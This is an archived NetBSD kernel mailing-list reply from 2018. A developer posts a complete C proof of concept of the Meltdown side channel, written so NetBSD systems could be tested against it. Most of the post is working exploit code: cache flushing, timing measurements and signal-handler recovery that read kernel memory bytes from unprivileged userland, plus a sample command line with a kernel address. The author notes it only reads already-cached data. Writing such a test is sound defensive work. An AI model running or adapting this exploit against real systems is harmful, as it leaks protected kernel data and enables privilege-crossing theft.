tech-kern archive

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index][Old Index]

Re: virtual to physical memory address translation



> Date: Mon, 15 Jan 2018 12:47:52 +0000
> From: Emmanuel Dreyfus <manu%netbsd.org@localhost>
> 
> Sorry if that has been covered ad nauseum, but I canot find relevant
> information about that: on NetBSD, how can I get the physical memory
> address given a virtual memory address? This is to port the Linux
> Meltdown PoC so that we have something to test our systems against.

Here's a PoC that doesn't need vtophys mapping.  It can read any data
out of the cache line of rnd_global.pool.stats.curentropy from
unprivileged userland.  You can find these addresses and confirm the
data read with the help of crash(8).  Example usage:

   ./meltdown 0xffffffff80f20300 64 | hexdump -C

If adapted slightly, root can be taught to read from more cache lines,
possibly into the entropy pool data itself -- which of course it could
read anyway from /dev/kmem.

I have not figured out how to make it read anything that is not
already cached a priori, but I didn't try the physical memory
mappings.
/*-
 * Copyright (c) 2018 Taylor R. Campbell
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#include <sys/ioctl.h>
#include <sys/rnd.h>

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

const unsigned		pgsz = 4096;
const unsigned		ntrials = 20;

jmp_buf			reset;
uint64_t		kaddr;
uint8_t			*kptr;
uint8_t			ubuf[4096*(256 + 2)]; /* guard pages on either end */
uint8_t			*uptr = ubuf + 4096;
unsigned		vote[256];

/*
 * rdtsc_fenced()
 *
 *	Wait for all prior CPU instructions to complete and then return
 *	the CPU cycle counter.
 */
static inline uint64_t
rdtsc_fenced(void)
{
	uint32_t lo, hi;

	/*
	 * rdtscp works if we have it, but not all x86 CPUs have it.
	 * On Intel, lfence is sufficient; on AMD, need mfence.
	 */
	asm volatile("mfence; rdtsc" : "=a"(lo), "=d"(hi));

	return ((uint64_t)hi << 32) | lo;
}

/*
 * clflush(ptr)
 *
 *	Flush the data cache line for ptr if any.
 */
static inline void
clflush(const void *ptr)
{

	asm volatile("clflush (%0)" : : "r"(ptr));
}

/*
 * meltdown(k, u)
 *
 *	Prime u[pgsz*k[0]] in the cache and leave u[pgsz*i] for all i
 *	=/= k[0] alone.  k may be a forbidden pointer in anywhere in
 *	the virtual address space such as as pointer into kernel memory
 *	without the `u' (user-accessible) page permission bit.
 */
static inline uint8_t
meltdown(const uint8_t *k, const uint8_t *u)
{
	unsigned long i;
	uint8_t v;

	do i = pgsz*k[0]; while (i == 0);
	v = u[i];

	return v;
}

/*
 * sighandler(signo)
 *
 *	Vote on which byte in the global user buffer seemed to be
 *	primed by speculative execution that ran ahead of the CPU trap
 *	causing signal delivery.  Then longjmp back to your regularly
 *	scheduled programming.
 */
static void
sighandler(int signo)
{
	uint64_t t0, t1, tmin;
	unsigned i, imin;
	volatile uint8_t ubyte;

	(void)signo;

	tmin = UINT64_MAX;
	imin = 0;
	for (i = 0; i < 256; i++) {
		t0 = rdtsc_fenced();
		ubyte = uptr[pgsz*i];
		t1 = rdtsc_fenced();
		if (t1 - t0 <= tmin) {
			tmin = t1 - t0;
			imin = i;
		}
	}
	vote[imin]++;
	longjmp(reset, 1);
}

/*
 * prime()
 *
 *	Prime the CPU cache for the target kernel address.  In this
 *	case, we try to prime it for rnd_pool.stats.curentropy, which
 *	is allowed to be read by the user but surrounded by pool
 *	statistics that are forbidden.
 *
 *	Also nearby is the actual data in the entropy pool -- but it's
 *	the next cache line over, alas, and my CPU doesn't seem to be
 *	prefetching surrounding cache lines.
 */
static void
prime(void)
{
	static int fd = -1;
	uint32_t entcnt;

	/* Make sure we have opened /dev/urandom.  */
	if (fd == -1) {
		if ((fd = open("/dev/urandom", O_RDONLY)) == -1)
			err(1, "open /dev/urandom");
	}

	/*
	 * Don't care what the answer is; just ask the kernel to do
	 * something for us.
	 */
	(void)ioctl(fd, RNDGETENTCNT, &entcnt);
}

int
main(int argc, char **argv)
{
	volatile unsigned trial; /* for setjmp */
	volatile uint8_t ubyte;	 /* to thwart optimization */
	char *end;
	unsigned long count = 1;
	unsigned i, ibest, vbest;

	/* Set up progname and usage.  */
	setprogname(argv[0]);
	if (argc != 2 && argc != 3)
		errx(1, "usage: %s <addr> [<count>]\n", getprogname());

	/* Parse the address.  */
	errno = 0;
	kaddr = strtoumax(argv[1], &end, 0);
	if (end == argv[1] || end[0] != '\0' || errno)
		errx(1, "invalid address");
	kptr = (void *)(uintptr_t)kaddr;

	/* Parse the count, if any.  */
	if (argc == 3) {
		errno = 0;
		count = strtoul(argv[2], &end, 0);
		if (end == argv[2] || end[0] != '\0' || errno)
			errx(1, "invalid count");
	}

	/* For as many bytes as requested...  */
	while (count --> 0) {

		/* Prepare to handle SIGSEGV.  */
		if (signal(SIGSEGV, &sighandler) == SIG_ERR)
			err(1, "signal");

		/* Dry run to ramp up the CPU.  */
		for (trial = 0; trial < ntrials; trial++) {
			if (setjmp(reset) == 0) {
				for (i = 0; i < 256; i++)
					clflush(&uptr[i*pgsz]);
				register uint8_t *uptr0 = uptr;
				register uint8_t *kptr0 = kptr;
				prime();
				ubyte = meltdown(kptr0, uptr0);
				return 123; /* fail */
			}
		}

		/* Reset the vote tallies.  */
		memset(vote, 0, sizeof vote);

		/* Do it!  */
		for (trial = 0; trial < ntrials; trial++) {
			if (setjmp(reset) == 0) {
				for (i = 0; i < 256; i++)
					clflush(&uptr[i*pgsz]);
				register uint8_t *uptr0 = uptr;
				register uint8_t *kptr0 = kptr;
				prime();
				ubyte = meltdown(kptr0, uptr0);
				return 123; /* fail */
			}
		}

		/* Restore SIGSEGV to default to catch bugs later.  */
		if (signal(SIGSEGV, SIG_DFL) == SIG_ERR)
			err(1, "signal");

		/* Naively count the ballots.  */
		ibest = 0;
		vbest = vote[0];
		for (i = 0; i < 256; i++) {
			if (vote[i] > vbest) {
				ibest = i;
				vbest = vote[i];
			}
		}

		/*
		 * Heuristically guess that if the plurality is not a
		 * majority, we probably got fooled by zero.
		 */
		if (vbest < ntrials/2)
			ibest = 0;

		/* Print the winner.  */
		if (printf("%c", (char)ibest) < 0)
			err(1, "printf");

		/* Advance to the next byte.  */
		kptr++;
	}

	/* Success!  */
	return 0;
}


Home | Main Index | Thread Index | Old Index